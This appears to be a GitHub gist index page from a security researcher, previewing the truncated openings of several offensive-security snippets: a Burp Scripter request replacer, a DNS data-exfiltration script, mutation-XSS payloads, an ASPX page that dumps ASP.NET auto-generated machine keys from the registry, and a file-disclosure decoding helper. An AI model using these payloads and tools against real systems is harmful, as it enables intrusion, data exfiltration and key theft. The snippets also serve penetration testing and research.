View pyscripter_snippets.py
# ***********************************************replacer_for_python_scripter | |
import re,random | |
print callbacks.getToolName(toolFlag) | |
if(messageIsRequest): | |
if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"): | |
requestInfo = helpers.analyzeRequest(messageInfo) | |
headers = requestInfo.getHeaders() | |
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] | |
msg = helpers.bytesToString(msgBody) |
View dns_data_exfiltration.sh
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick but haven't tested it: | |
outer_cmd_template="powershell -enc %CMD_B64%" |
View dns_data_exfiltration.sh
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick but haven't tested it: | |
outer_cmd_template="powershell -enc %CMD_B64%" |
View mXSS
<img alt="<x" title="/><img src=url404 onerror=xss(0)>"> | |
<img alt=" | |
<x" title="/> | |
<img src=url404 onerror=xss(1)>"> | |
<style><style/><img src=url404 onerror=xss(2)> | |
<xmp><xmp/><img src=url404 onerror=xss(3)> |
View machineKeyFinder.aspx
<%@ Page Language="C#" %> | |
<% | |
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
Response.Write("<br/><hr/>"); | |
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
if(autoGenKeyV4!=null) | |
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
Response.Write("<br/>"); | |
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
if(autoGenKey!=null) |
View iso-8859-1_to_binary.py
# Convert from iso-8859-1, utf-8ed to binary! | |
# Useful for file disclosure when encoding can be controlled | |
# The following C# code shows an example (result is iso-8859-1, utf-8ed!): | |
###string encoding = "iso-8859-1"; | |
######string sourceFile = @"Newtonsoft.Json.dll"; | |
###### | |
######public void test() | |
######{ | |
#########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding); | |
#########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile; |